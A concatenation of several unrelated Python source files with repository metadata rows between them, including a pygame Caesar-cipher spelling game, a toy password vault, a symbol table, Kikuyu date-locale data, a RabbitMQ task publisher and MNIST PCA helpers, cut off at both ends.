    :param bg: Sets the background colour of the text on the window. Default value is None.
    '''
    font = pygame.font.SysFont(None, font_size)
    # BUGFIX: the original accepted `bg` but never used it; honour it so
    # callers can paint the text over a solid background colour.
    if bg is None:
        screen_text = font.render(msg, True, color)
    else:
        screen_text = font.render(msg, True, color, bg)
    if center:
        # Center the text rectangle on (width, height).
        text_rect = screen_text.get_rect(center=(width, height))
        gameDisplay.blit(screen_text, text_rect)
    else:
        gameDisplay.blit(screen_text, [width, height])
def check(word, choice):
    '''
    Performs the same function as that of check() function of class Encrypter..except that the messages are displayed to the GUI rather than being printed out to the console.
    :param word: The input word to be operated on.
    :param choice: The selected game mode; forwarded to encrypter.score().
    '''
    w = ""
    i = 0
    m = ""
    # Spell the word letter by letter.  encrypter.counter tracks trials
    # (presumably incremented inside encrypter.test -- confirm); 20 is the cap.
    while i < len(word) and encrypter.counter < 20:
        subprocess.call(["espeak", str(20 - encrypter.counter) + " trials left"])
        w1 = encrypter.test(w, word[i])
        # Erase the previously drawn text by re-rendering it in black.
        message(m, black, display_width / 2, display_height / 2, 40, True, black)
        pygame.display.update()
        if w1 is not "-":
            # Accepted letter: extend the confirmed prefix and advance.
            w = w1
            message(w.upper(), white, display_width / 2, display_height / 2, 40, True)
            pygame.display.update()
            m = w.upper()
            i += 1
        else:
            # Rejected attempt: show the prefix plus the rejection marker.
            message((w + w1).upper(), white, display_width / 2, display_height / 2, 40, True)
            pygame.display.update()
            m = (w + w1).upper()
        if w == word:
            subprocess.call(["espeak", "-s", "125", " Good!"])
            message("Good", green, display_width / 2, (3 * display_height) / 4, 45, True)
            pygame.display.update()
            break
    if encrypter.counter >= 20:
        # Out of trials: speak and display the correct answer.
        subprocess.call(["espeak", "-s", "125", " No you are wrong...the answer will be "])
        for j in word:
            subprocess.call(["espeak", "-s", "100", j])
        message("Answer-> " + word, red, display_width / 2, (3 * display_height) / 4, 45, True)
        pygame.display.update()
    message("Score out of 10: " + str(encrypter.score(w, word, choice=choice)), green, display_width / 2,
            (5 * display_height) / 6, 40, True)
    pygame.display.update()
def main():
    '''
    The main block of the program which runs the entire display.

    Initializes pygame, picks a random word, then runs one round of the
    selected game mode (1: encode, 2: decode, 3: guess the shift key).
    '''
    pygame.init()  # Initialize pygame
    global encrypter
    encrypter = Encrypter.Encrypter()
    global m, black, white, green, blue, red, display_width, display_height
    choice = ""
    m = ""
    # Retry until the word source yields a word.
    while True:
        try:
            random_word = encrypter.rand_word()
            break
        except Exception as e:
            print(e)
    white = (255, 255, 255)
    red = (255, 0, 0)
    black = (0, 0, 0)
    blue = (0, 0, 255)
    green = (0, 255, 0)
    global gameDisplay
    gameDisplay = pygame.display.set_mode((800, 600))  # Pass a tuple as a parameter
    display_width = 800
    display_height = 600
    pygame.display.set_caption("Encrypter")
    pygame.display.update()  # Update the specific modification
    clock = pygame.time.Clock()
    gameExit = False
    # The outer loop runs exactly once: gameExit is set True at the bottom.
    while not gameExit:
        message("Encrypter", blue, display_width / 7, display_height / 7, 50)
        pygame.display.update()
        # Block until a non-empty mode choice is produced.
        while True:
            choice = encrypter.choose()
            if choice is not "":
                break
        if choice == "1":
            # Runs Encode Game
            s = encrypter.rand_int()
            hint = encrypter.shift("anirban", s)
            with encrypter.lock:
                subprocess.call(["espeak", " If anirban is encoded as " + str(hint)])
            hint_str = ""
            for h in hint:
                hint_str = hint_str + h
            message("anirban -> " + hint_str, white, display_width / 4, display_height / 4, 30)
            pygame.display.update()
            encode = encrypter.shift(random_word, s)
            with encrypter.lock:
                subprocess.call(["espeak", " Then encode " + random_word])
            message(random_word + " ->" + " ?", white, display_width / 4, display_height / 3, 30)
            pygame.display.update()
            encode_str = ""
            for h in encode:
                encode_str = encode_str + h
            check(encode_str, choice)
        elif choice == "2":
            # Runs Decode Game
            s = encrypter.rand_int()
            hint = encrypter.shift("anirban", s)
            hint_str = ""
            for h in hint:
                hint_str = hint_str + h
            with encrypter.lock:
                subprocess.call(["espeak", " If " + str(hint) + "is decoded as anirban"])
            message(hint_str + " -> anirban", white, display_width / 4, display_height / 4, 30)
            pygame.display.update()
            encode = encrypter.shift(random_word, s)
            with encrypter.lock:
                subprocess.call(["espeak", " Then decode " + str(encode)])
            encode_str = ""
            for h in encode:
                encode_str = encode_str + h
            message(encode_str + " ->" + " ?", white, display_width / 4, display_height / 3, 30)
            pygame.display.update()
            check(random_word, choice)
        elif choice == "3":
            # Runs Guessing Game to guess the shifting key for arriving at the correct answer
            e = ""
            s = encrypter.rand_int()
            encode = encrypter.shift(random_word, s)
            encode_str = ""
            for p in encode:
                encode_str = encode_str + p
            subprocess.call(["espeak", " Guess the shifting key if " + random_word + " is encoded as " + encode_str])
            message(random_word + "->" + encode_str, white, display_width / 4, display_height / 4, 40)
            pygame.display.update()
            message("SHIFTED WORD " + random_word.upper(), white, display_width / 2, display_height / 2, 40, True)
            pygame.display.update()
            m = "SHIFTED WORD " + random_word.upper()
            # Up to 10 spoken-number guesses, recognised via the recorder.
            for k in range(10):
                subprocess.call(["espeak", str(10 - k) + " trials left"])
                with encrypter.lock:
                    rec = recorder.Recorder("../../../Language_Models/", "../../../Acoustic_Models/", L_LIB="num",
                                            A_LIB="en-us", TRIALS=1, DECODE=True,
                                            SILENCE=1)
                    rec.start()
                # The recogniser writes its hypothesis to ./test.hyp.
                r = open('./test.hyp', 'r')
                arr = r.read().split(" ")
                num = arr[0]
                r.close()
                try:
                    e = encrypter.shift(random_word, int(num))
                except Exception as z:
                    print(z)
                # Erase the previous guess by re-rendering it in black.
                message(m.upper(), black, display_width / 2, display_height / 2, 40, True, black)
                pygame.display.update()
                e_str = ""
                for p in e:
                    e_str = e_str + p
                message("SHIFTED WORD " + e_str.upper(), white, display_width / 2, display_height / 2, 40, True)
                pygame.display.update()
                m = "SHIFTED WORD " + e_str.upper()
                if e_str == encode_str:
                    subprocess.call(["espeak", "-s", "120", " Good!"])
                    break
                elif k == 9:
                    subprocess.call(["espeak", "-s", "120", " No you are wrong...the answer will be " + str(s)])
                    message("Answer-> " + str(s), red, display_width / 2, (3 * display_height) / 4, 45, True)
                    pygame.display.update()
            # k is 0-based; convert to the number of trials used.
            k += 1
            message("Score out of 10: " + str(encrypter.score(trials=k, choice=choice)), green, display_width / 2,
                    (5 * display_height) / 6, 40, True)
            pygame.display.update()
        else:
            message("Wrong Choice", red, display_width / 2, display_height / 2, 45, True)
            pygame.display.update()
        gameExit = True
        clock.tick(20)
    subprocess.call(["espeak", "-s", "125", " Options are 1: Resume and 2: Start another game"])
    pygame.quit()
    quit()
if __name__ == "__main__":
    # Run one round of the GUI game when executed directly.
    main()
| [
"anirbanbanik17@gmail.com"
] | anirbanbanik17@gmail.com |
a401aaa862e6f2bc65f030853a132d572477afd0 | c9b4afeb20987fa33e0b1c3a5d8b35b6d729308f | /PassVault.py | 07450eb55a60959e85b525a162d3469bffd58859 | [] | no_license | mosheduminer/PassVault | 7931a50764bb9dca57f496231f7eb98e12467de6 | 0050da5f4b0305d908b3cf77e02b7a99ea9995bb | refs/heads/master | 2020-04-22T00:21:58.918460 | 2019-02-11T01:18:31 | 2019-02-11T01:18:31 | 169,977,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,515 | py | from os import path
from sys import exit
from time import sleep
class cipher():
    """Wraps a user-supplied cipher string and derives a numeric key from it.

    ``valid`` is the string "yes" when the cipher is non-empty and consists
    only of printable ASCII characters (codes 32..126), otherwise "no".
    """

    def __init__(self, c):
        self.c = c
        self.lc = len(c)
        # Validate: non-empty and every character printable ASCII.
        if self.lc and all(31 < ord(ch) < 127 for ch in c):
            self.valid = "yes"
        else:
            self.valid = "no"

    def key(self):
        """Replace the cipher with the concatenation of its character codes."""
        if self.valid == "yes":
            self.c = "".join(str(ord(ch)) for ch in self.c)
def check_for_file():
    """Return True when the password file exists at the module-level path."""
    # Delegates straight to os.path.exists on the global `location`.
    return path.exists(location)
def file_create(location):
    """Offer to create an empty password file at *location*; exit on refusal."""
    print("\nNo password file found.\n")
    i = input("Would you like to create a password file?"
              " Enter \"yes\" or \"no\": ")
    if i == "yes":
        # Opening in "w" mode creates the empty file; nothing is written.
        with open(location, "w") as openf:
            openf
    else:
        # Any answer other than "yes" aborts the program.
        terminate(0.5)
def read_file(location, c):
    """Read the encrypted password file and return the decrypted, sorted text.

    Args:
        location: path of the encrypted password file.
        c: cipher object whose ``c`` attribute is the numeric key string and
           whose ``lc`` attribute is the length of the original cipher.

    Returns:
        The decrypted entries, sorted alphabetically and joined with single
        spaces (including a trailing space).
    """
    # BUGFIX: use a context manager so the handle is always closed (the
    # original opened the file and never closed it).
    with open(location, "r") as file:
        cipher_text = file.read()
    text = ""
    for i in range(len(cipher_text)):
        # Invert the shift applied by add_to_file(): map into 0..94,
        # subtract the key digit modulo 95, map back into ASCII 31..125.
        text_val = ord(cipher_text[i]) - 31
        text_val = text_val + 95 - int(c.c[i % c.lc])
        text_val = text_val % 95 + 31
        text = text + chr(text_val)
    # Sort accounts alphabetically.
    text_list = text.split(",")
    text_list.sort()
    text = ""
    for item in text_list:
        text = text + item + " "
    return text
def add_to_file(text, c):
    """Encrypt *text* with cipher *c* and overwrite the password file."""
    # Shift every character by the matching key digit, staying inside the
    # printable ASCII range 31..125.
    cipher_chars = []
    for position in range(len(text)):
        shifted = ord(text[position]) - 31
        shifted = shifted + int(c.c[position % c.lc])
        shifted = shifted % 95 + 31
        cipher_chars.append(chr(shifted))
    # Rewrite the file with the complete encrypted contents.
    with open(location, "w") as file:
        file.write("".join(cipher_chars))
def terminate(t):
    """Announce a fatal error, wait *t* seconds, then exit the interpreter."""
    notice = f"There has been an error. The program will terminate in {t} seconds"
    print(notice)
    sleep(t)
    exit()
# Path of the encrypted password store.
location = "password"
file_status = check_for_file()
if file_status is False:
    # Offer to create the store on first run (exits if the user declines).
    file_create(location)
print("Welcome to PassVault, please enter your cipher.\n")
print("It may be made of numbers, letters or symbols\n")
# Keep prompting until a valid (printable-ASCII, non-empty) cipher is given.
while True:
    c = input("Enter your cipher: ")
    c = cipher(c)
    if c.valid != "yes":
        print("Invalid cipher. Try another one")
    else:
        break
# Turn the cipher text into its numeric key form used for shifting.
c.key()
# Main loop: show decrypted entries, optionally append a new account entry.
while True:
    unciphered = read_file(location, c)
    print(unciphered)
    request_p = input("Would you like to add more passwords?\n"
                      "Enter any input to quit, or enter \"yes\": ")
    if request_p != "yes":
        exit()
    else:
        account = input("If you have entered \"yes\" by accident,"
                        " exit the program immediately.\n"
                        "Otherwise, enter what account"
                        " you wish to enter a password for: ")
        password = input("Enter password: ")
        # NOTE(review): entries are comma-separated when appending to existing
        # data, but the very first entry ends with a space -- confirm intent.
        if len(unciphered) > 0:
            unciphered = f"{unciphered}{account}:{password},"
        else:
            unciphered = f"{account}:{password} "
        add_to_file(unciphered, c)
"noreply@github.com"
] | mosheduminer.noreply@github.com |
abaaec9d260cef7e59f27576dbc6108f81d1aba5 | 441c4cd6a2a751963afb8a6594576bcf11a63b2d | /lab2/SymbolTable.py | 13e3855711c298f3288cd19d57c339f5ea9af211 | [] | no_license | michlampert/kompilatory | 8404c880746626fdcdd44471489be62a9cb2e996 | 73dc5fdc979bb3b0ab39bbe5d9533231877bf448 | refs/heads/main | 2023-02-17T05:04:20.645435 | 2021-01-13T20:33:25 | 2021-01-13T20:33:25 | 302,153,347 | 0 | 0 | null | 2021-01-13T20:33:26 | 2020-10-07T20:32:23 | Python | UTF-8 | Python | false | false | 855 | py | class VariableSymbol():
    def __init__(self, name, ttype):
        """Record a variable's identifier and its declared type."""
        self.name = name
        self.type = ttype
class SymbolTable(object):
    """Hierarchical symbol table with lookup through enclosing scopes."""

    def __init__(self, parent, name):  # parent scope and symbol table name
        self.parent = parent    # enclosing SymbolTable, or None for the global scope
        self.name = name        # human-readable scope name
        self.symbols = {}       # identifier -> symbol (variable or fundef)

    def put(self, name, symbol):  # put variable symbol or fundef under <name> entry
        self.symbols[name] = symbol

    def get(self, name):  # get variable symbol or fundef from <name> entry
        """Look up *name* here, then in enclosing scopes; None if absent."""
        if name in self.symbols:
            return self.symbols[name]
        if self.parent:
            return self.parent.get(name)
        return None

    def getParentScope(self):
        return self.parent

    def pushScope(self, name):
        # BUGFIX: the original rebound the local `self`, which had no effect.
        # Return the new child scope so callers can adopt it.
        return SymbolTable(self, name)

    def popScope(self):
        # BUGFIX: likewise, return the parent scope instead of rebinding
        # the local `self`.
        return self.parent
| [
"wachtelik@gmail.com"
] | wachtelik@gmail.com |
df3bf69e1052d215786ee3266d66ff9529129bf4 | 174aa0021c10ebe4d7598b44404f8dfcad0cbc24 | /dateparser/data/date_translation_data/ki.py | dc720c347e27c7789baf072713bafc901736f7cb | [
"BSD-3-Clause"
] | permissive | Ronserruya/dateparser | 6789fc84bd548e040975ab693c50362673960571 | 238d0dbc7a03a00c29818e474f28848e100010bc | refs/heads/master | 2022-07-07T09:33:37.849429 | 2020-05-13T07:19:56 | 2020-05-13T07:19:56 | 263,635,745 | 0 | 0 | BSD-3-Clause | 2020-05-13T13:20:15 | 2020-05-13T13:20:15 | null | UTF-8 | Python | false | false | 2,714 | py | # -*- coding: utf-8 -*-
# Kikuyu ("ki") locale data for dateparser: month/day names with their
# abbreviations, day-period markers, calendar units, relative-date phrases,
# and filler tokens that the parser should skip.
info = {
    "name": "ki",
    "date_order": "DMY",
    "january": [
        "njenuarĩ",
        "jen"
    ],
    "february": [
        "mwere wa kerĩ",
        "wkr"
    ],
    "march": [
        "mwere wa gatatũ",
        "wgt"
    ],
    "april": [
        "mwere wa kana",
        "wkn"
    ],
    "may": [
        "mwere wa gatano",
        "wtn"
    ],
    "june": [
        "mwere wa gatandatũ",
        "wtd"
    ],
    "july": [
        "mwere wa mũgwanja",
        "wmj"
    ],
    "august": [
        "mwere wa kanana",
        "wnn"
    ],
    "september": [
        "mwere wa kenda",
        "wkd"
    ],
    "october": [
        "mwere wa ikũmi",
        "wik"
    ],
    "november": [
        "mwere wa ikũmi na ũmwe",
        "wmw"
    ],
    "december": [
        "ndithemba",
        "dit"
    ],
    "monday": [
        "njumatatũ",
        "ntt"
    ],
    "tuesday": [
        "njumaine",
        "nmn"
    ],
    "wednesday": [
        "njumatana",
        "nmt"
    ],
    "thursday": [
        "aramithi",
        "art"
    ],
    "friday": [
        "njumaa",
        "nma"
    ],
    "saturday": [
        "njumamothi",
        "nmm"
    ],
    "sunday": [
        "kiumia",
        "kma"
    ],
    "am": [
        "kiroko"
    ],
    "pm": [
        "hwaĩ-inĩ"
    ],
    "year": [
        "mwaka"
    ],
    "month": [
        "mweri"
    ],
    "week": [
        "kiumia"
    ],
    "day": [
        "mũthenya"
    ],
    "hour": [
        "ithaa"
    ],
    "minute": [
        "ndagĩka"
    ],
    "second": [
        "sekunde"
    ],
    "relative-type": {
        "1 year ago": [
            "last year"
        ],
        "0 year ago": [
            "this year"
        ],
        "in 1 year": [
            "next year"
        ],
        "1 month ago": [
            "last month"
        ],
        "0 month ago": [
            "this month"
        ],
        "in 1 month": [
            "next month"
        ],
        "1 week ago": [
            "last week"
        ],
        "0 week ago": [
            "this week"
        ],
        "in 1 week": [
            "next week"
        ],
        "1 day ago": [
            "ira"
        ],
        "0 day ago": [
            "ũmũthĩ"
        ],
        "in 1 day": [
            "rũciũ"
        ],
        "0 hour ago": [
            "this hour"
        ],
        "0 minute ago": [
            "this minute"
        ],
        "0 second ago": [
            "now"
        ]
    },
    "locale_specific": {},
    "skip": [
        " ",
        ".",
        ",",
        ";",
        "-",
        "/",
        "'",
        "|",
        "@",
        "[",
        "]",
        ","
    ]
}
"sarthakmadaan5121995@gmail.com"
] | sarthakmadaan5121995@gmail.com |
d46fe004e10c5667c296cf71217f95529c31f646 | c0a34cb6afebe699c55fdef5050b7a3efd0385cf | /media.py | 015fdaee40e02f6683a3d56def5385d891d48db3 | [] | no_license | wonjunee/movie-website | fdf4dbf9953af3e7c820ab3371ca793f44d03e2f | 6656282c2636e5b5e79888faacefde32384f56ba | refs/heads/master | 2020-12-05T08:12:14.925657 | 2016-09-01T15:27:37 | 2016-09-01T15:27:37 | 66,372,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 969 | py | import webbrowser
class Video():
    """Base media item: a title, a storyline and a poster image URL."""

    def __init__(self, title, storyline, poster_image_url):
        self.title = title
        self.storyline = storyline
        self.poster_image_url = poster_image_url
class Movie(Video):
    """ This class provides a way to store movie related information"""

    # Ratings this catalogue accepts (US MPAA system).
    VALID_RATINGS = ["G", "PG", "PG-13", "R"]

    def __init__(self, title, storyline, poster_image_url, trailer, releaseYear, rating, director):
        super().__init__(title, storyline, poster_image_url)
        self.trailer_youtube_url = trailer
        self.releaseYear = releaseYear
        self.rating = rating
        self.director = director

    def show_trailer(self):
        """Open the movie's trailer URL in the default web browser."""
        webbrowser.open(self.trailer_youtube_url)
# This is a class for TV shows. But it won't be included in the website this time.
class TvShow(Video):
    """A TV show, extending Video with a trailer URL and a season count.

    BUGFIX: the original assigned the undefined name ``num_seasons`` (and
    ignored the ``trailer`` argument), so every instantiation raised
    NameError.  ``num_seasons`` is now an explicit parameter with a
    backward-compatible default, and the trailer URL is stored.
    """

    VALID_RATINGS = ["G", "PG", "PG-13", "R"]

    def __init__(self, title, storyline, poster_image_url, trailer, num_seasons=0):
        Video.__init__(self, title, storyline, poster_image_url)
        self.trailer_youtube_url = trailer
        self.num_seasons = num_seasons
| [
"mymamyma@gmail.com"
] | mymamyma@gmail.com |
80c0c27870ce71a22e174624e3284d9f31530be7 | 500bb70b7ff3713ccbee645b9eef44ae148c325a | /rabbitmq_example/2WorkerQueue/new_task.py | c1cc9dddd5771c018c70704af6ac7a3ce5ef3ee1 | [] | no_license | DipalModi18/PythonTutorial | 3bc64a6c43c64cae8825e0b135c21533f6c6948e | 43ca5cfa0077b1b08076c8cb02046a49a1694520 | refs/heads/master | 2021-07-09T11:55:31.236377 | 2020-07-29T16:41:56 | 2020-07-29T16:41:56 | 171,649,042 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | # Reference: https://www.rabbitmq.com/tutorials/tutorial-two-python.html
import sys
import pika
# The main idea behind Work Queues (aka: Task Queues) is to avoid doing a
# resource-intensive task immediately and having to wait for it to complete.
# We encapsulate a task as a message and send it to the queue.
# A worker process running in the background will pop the tasks and eventually execute the job.
# When you run many workers the tasks will be shared between them.

# Connect to a local RabbitMQ broker and make sure the queue exists
# (queue_declare is idempotent).
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='hello')
# The task text comes from the command line; defaults when none is given.
message = ' '.join(sys.argv[1:]) or "Hello World!"
# Publish via the default exchange; routing_key selects the queue.
channel.basic_publish(exchange='',
                      routing_key='hello',
                      body=message)
print(" [x] Sent %r" % message)
# To run: python3 new_task.py First message.... ==> No. of dots specify here how long the task is
# i.e. 4 dots means it will take 4 sec to complete the work by the worker.
| [
"dmodi@sevone.com"
] | dmodi@sevone.com |
b91e5b6c07aa7a2ff0caf5f8e4cf9177fc49c24e | 807633994b9b6469379b97f31ce32b26f8009309 | /src/unicef_notification/validations.py | d3bb3305b8cb1f553eacf3486bc3378973a07123 | [
"Apache-2.0"
] | permissive | achamseddine/unicef-notification | b3eb499b56f680cad320ec3838a5c8b70e7c37b0 | 3ea1f9a3c695ce9f871f6dc2fbfc44d42f4bb34b | refs/heads/master | 2022-12-15T10:17:57.040794 | 2018-08-08T14:52:07 | 2018-08-08T14:52:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | from django.core.exceptions import ValidationError
from post_office.models import EmailTemplate
def validate_template_name(template_name):
    """Raise ValidationError unless an EmailTemplate named *template_name* exists."""
    try:
        EmailTemplate.objects.get(name=template_name)
    except EmailTemplate.DoesNotExist:
        raise ValidationError("No such EmailTemplate: %s" % template_name)
def validate_method_type(method_type):
    """Raise ValidationError unless *method_type* is an allowed notification type."""
    # Imported locally, presumably to avoid a circular import -- confirm.
    from unicef_notification.models import Notification
    # NOTE(review): TYPE_CHOICES is membership-tested directly; if it is a
    # Django choices list of (value, label) pairs, plain values never match
    # -- confirm against the Notification model.
    if method_type not in (Notification.TYPE_CHOICES):
        raise ValidationError("Notification type must be 'Email'")
| [
"greg@reinbach.com"
] | greg@reinbach.com |
da90f416192e97abb37a1c2a0acb8759b7bcda33 | 52ce59408b028200e66f237d7b9ef47c5c941a22 | /emotion_data/behaviour.py | 9b8dd27bd7de3f38d3454caeaa491c5ae63eff5c | [] | no_license | alternativeritam/emotion_data | 9fe3f0e9cff0ffe1178aceb81364205191d43ea9 | b3b859a511d09040cdd3171db11641ae273af5c6 | refs/heads/master | 2021-10-10T12:22:56.906162 | 2019-01-10T18:08:03 | 2019-01-10T18:08:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,760 | py | from emotion_data.emotions import EMOTIONS
# Instinctive behaviours: each entry records its adaptive purpose and the
# names of the emotions that activate it (keys into EMOTIONS).
BEHAVIOUR_NAMES = {
    "protection": {
        "purpose": "Withdrawal, retreat",
        "activated_by": ["fear", "terror"]
    },
    "destruction": {
        "purpose": "Elimination of barrier to the satisfaction of needs",
        "activated_by": ["anger", "rage"]
    },
    "incorporation": {
        "purpose": "Ingesting nourishment",
        "activated_by": ["acceptance"]
    },
    "rejection": {
        "purpose": "Riddance response to harmful material",
        "activated_by": ["disgust"]
    },
    "reproduction": {
        "purpose": "Approach, contract, genetic exchanges",
        "activated_by": ["joy", "pleasure"]
    },
    "reintegration": {
        "purpose": "Reaction to loss of nutrient product",
        "activated_by": ["sadness", "grief"]
    },
    "exploration": {
        "purpose": "Investigating an environment",
        "activated_by": ["curiosity", "play"]
    },
    "orientation": {
        "purpose": "Reaction to contact with unfamiliar object",
        "activated_by": ["surprise"]
    }
}
# Behavioural reactions: each maps a trigger and cognitive appraisal to a
# base emotion (key into EMOTIONS) and a behaviour (key into BEHAVIOUR_NAMES).
REACTION_NAMES = {
    "retain or repeat": {
        "function": "gain resources",
        "cognite appraisal": "possess",
        "trigger": "gain of value",
        "base_emotion": "serenity",
        "behaviour": "incorporation"
    },
    "groom": {
        "function": "mutual support",
        "cognite appraisal": "friend",
        "trigger": "member of one's group",
        "base_emotion": "acceptance",
        "behaviour": "reproduction"
    },
    "escape": {
        "function": "safety",
        "cognite appraisal": "danger",
        "trigger": "threat",
        "base_emotion": "apprehension",
        "behaviour": "protection"
    },
    "stop": {
        "function": "gain time",
        "cognite appraisal": "orient self",
        "trigger": "unexpected event",
        "base_emotion": "distraction",
        "behaviour": "orientation"
    },
    "cry": {
        "function": "reattach to lost object",
        "cognite appraisal": "abandonment",
        "trigger": "loss of value",
        "base_emotion": "pensiveness",
        "behaviour": "reintegration"
    },
    "vomit": {
        "function": "eject poison",
        "cognite appraisal": "poison",
        "trigger": "unpalatable object",
        "base_emotion": "boredom",
        "behaviour": "rejection"
    },
    "attack": {
        "function": "destroy obstacle",
        "cognite appraisal": "enemy",
        "trigger": "obstacle",
        "base_emotion": "annoyance",
        "behaviour": "destruction"
    },
    "map": {
        "function": "knowledge of territory",
        "cognite appraisal": "examine",
        "trigger": "new territory",
        "base_emotion": "interest",
        "behaviour": "exploration"
    }
}
class Behaviour(object):
    """One instinctive behaviour: its name, its purpose and its triggers."""

    def __init__(self, name, purpose=""):
        self.name = name
        self.purpose = purpose
        # Filled in later with the emotion objects that activate this behaviour.
        self.activated_by = []

    def __repr__(self):
        return f"BehaviourObject:{self.name}"
def _get_behaviours():
    """Build a name -> Behaviour map from BEHAVIOUR_NAMES, resolving emotions."""
    behaviours = {}
    for behaviour_name, spec in BEHAVIOUR_NAMES.items():
        entry = Behaviour(behaviour_name)
        entry.purpose = spec["purpose"]
        # Only emotions actually present in EMOTIONS are attached.
        for emotion_name in spec["activated_by"]:
            emotion = EMOTIONS.get(emotion_name)
            if emotion:
                entry.activated_by.append(emotion)
        behaviours[behaviour_name] = entry
    return behaviours


BEHAVIOURS = _get_behaviours()
class BehavioralReaction(object):
    """A reaction pattern linking a trigger to a base emotion and behaviour."""

    def __init__(self, name):
        self.name = name
        self.function = ""
        self.cognite_appraisal = ""
        self.trigger = ""
        self.base_emotion = None  # emotion object
        self.behaviour = None  # behaviour object

    def from_data(self, data=None):
        """Populate the fields from a REACTION_NAMES-style mapping."""
        if not data:
            data = {}
        self.name = data.get("name") or self.name
        self.function = data.get("function", "")
        self.cognite_appraisal = data.get("cognite appraisal", "")
        self.trigger = data.get("trigger", "")
        self.base_emotion = EMOTIONS.get(data.get("base_emotion", ""))
        self.behaviour = BEHAVIOURS[data["behaviour"]]

    def __repr__(self):
        return f"BehavioralReactionObject:{self.name}"
def _get_reactions():
    """Instantiate every reaction plus a name -> base-emotion lookup table."""
    reactions = {}
    emotion_map = {}
    for reaction_name, spec in REACTION_NAMES.items():
        reaction = BehavioralReaction(reaction_name)
        reaction.from_data(spec)
        reactions[reaction.name] = reaction
        emotion_map[reaction.name] = reaction.base_emotion
    return reactions, emotion_map


REACTIONS, REACTION_TO_EMOTION_MAP = _get_reactions()
if __name__ == "__main__":
    # Ad-hoc smoke test: dump the derived tables when run as a script.
    from pprint import pprint
    pprint(BEHAVIOURS)
    pprint(REACTIONS)
    pprint(REACTION_TO_EMOTION_MAP)
"jarbasai@mailfence.com"
] | jarbasai@mailfence.com |
54b2be42e83b330d1628b0b0222b4dbf05a1c53d | 4ad8e15d2d73be692903aed9228305dab35cdb80 | /main.py | 19d7baef13a93a33d876813405a8cff2bc959b2a | [] | no_license | rigved-sanku/Covid-19-Prediction | 500ce0cb9b0871c04528ed1c913b692b2ca0f891 | 363105cb1b877d0047235ec72a276b732f753923 | refs/heads/main | 2023-07-05T09:25:31.251640 | 2021-08-15T12:13:36 | 2021-08-15T12:13:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | model=MLP() #model is an object of class MLP
# Training the model
# NOTE(review): MLP, Layer, the *_scaled arrays, loadmodel and mse are
# defined/imported elsewhere in this project -- confirm before reuse.
NeuralNet1 = Layer(2,[2,5],activation=['linear'])
NeuralNet2 = Layer(4,[12,16,16,2],activation=['relu','relu','linear'])
epochs=1500
lr1=0.1    # learning rate for the first network
lr2=0.005  # learning rate for the second network
model.Train(Xnet1_train_scaled.T, Xnet2_train_scaled.T, Ytrain_scaled.T, NeuralNet1, NeuralNet2, epochs, lr1, lr2, printcost=True)
# Reload the weights that Train() persisted.
trainedNet1,trainedNet2 = loadmodel.load_weights()
# Checking on Validation Set
Ypred = model.Predict(Xnet1_train_scaled.T, Xnet2_train_scaled.T, trainedNet1, trainedNet2)
print('TRAINING LOSS :'+str((mse(Ypred.T,Ytrain_scaled))))
# Predicting
# Using model weights for test cases
test_days=test_days.reshape(1,test_days.shape[0])
Ypred_test = model.Test(Xnet1_test_scaled.T, Xnet2_test_scaled.T, test_days, trainedNet1, trainedNet2)
# Loss for Test Cases
print('TEST LOSS : ' + str(mse(Ypred_test,Ytest_scaled.T)))
"noreply@github.com"
] | rigved-sanku.noreply@github.com |
c6964c95050e59ebc7015bf6f15d7dc4ca2a9030 | edc4dfa7fbdc42d12d1d12b0cd15b1bec5b88074 | /exhand/test1.py | 8fdd3ffc038aa353fe3031b40a3fbe10dab1679a | [] | no_license | srikanthpragada/PYTHON_01_OCT_LANGDEMO | ed0236266102f8e38190b4ac076d5d46d2d61898 | c8d427e74f8ac6c32a081006e19cba92483735bf | refs/heads/master | 2020-03-30T20:27:56.490472 | 2018-11-03T15:29:18 | 2018-11-03T15:29:18 | 151,589,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | try:
num = int(input("Enter a number :"))
# process num
print("Result = " ,100 / num)
except Exception as ex: # Handle all exceptions
print("Error : ", ex)
else:
print("Success!")
finally:
print("Done!")
print("The End") | [
"srikanthpragada@gmail.com"
] | srikanthpragada@gmail.com |
e734cd15c4fe7124453b5121f3db1a3321e5636f | 7bea4acfdac07cc916fe0a7b16eddef536785721 | /unit_3/mnist/part1/features.py | 34e59b1f10ce98ca88cf92ecbca662f4d4c95dd7 | [] | no_license | MarinoSanLorenzo/FromLinearModelsToDeepLearning | b07713f9fc4b0939f264df1670adc06e86ecc3a0 | d22f3a796dfb5d7e5d470cc84ca15fefcaf7da3e | refs/heads/master | 2020-12-28T12:27:36.967202 | 2020-05-17T21:04:32 | 2020-05-17T21:04:32 | 238,332,017 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,723 | py | import numpy as np
import matplotlib.pyplot as plt
def project_onto_PC(X, pcs, n_components, feature_means):
    """
    Given principal component vectors pcs = principal_components(X)
    this function returns a new data array in which each sample in X
    has been projected onto the first n_components principal components.

    Args:
        X - n x d NumPy array of n data points, each with d features
        pcs - d x d NumPy array whose columns are the principal component
              directions, sorted by decreasing eigenvalue
        n_components - number of leading principal components to keep
        feature_means - (d,) NumPy array of column means used to center X

    Returns:
        n x n_components NumPy array of projected coordinates.
    """
    # Center with the supplied means, then project onto the leading
    # directions.  Each eigenvector is already unit-length, so a single
    # matrix product performs the full projection.
    return (X - feature_means) @ pcs[:, :n_components]
### Functions which are already complete, for you to use ###
def cubic_features(X):
    """
    Returns a new dataset with features given by the mapping
    which corresponds to the cubic kernel.
    """
    n, d = X.shape  # dataset size, input dimension
    # Append a constant 1 feature so bias terms appear among the monomials.
    X_withones = np.ones((n, d + 1))
    X_withones[:, :-1] = X
    new_d = 0  # dimension of output
    # Number of monomials of degree <= 3 in d variables: C(d+3, 3).
    new_d = int((d + 1) * (d + 2) * (d + 3) / 6)
    new_data = np.zeros((n, new_d))
    col_index = 0
    # First pass: cross terms x_i * x_j * x_k with three distinct indices
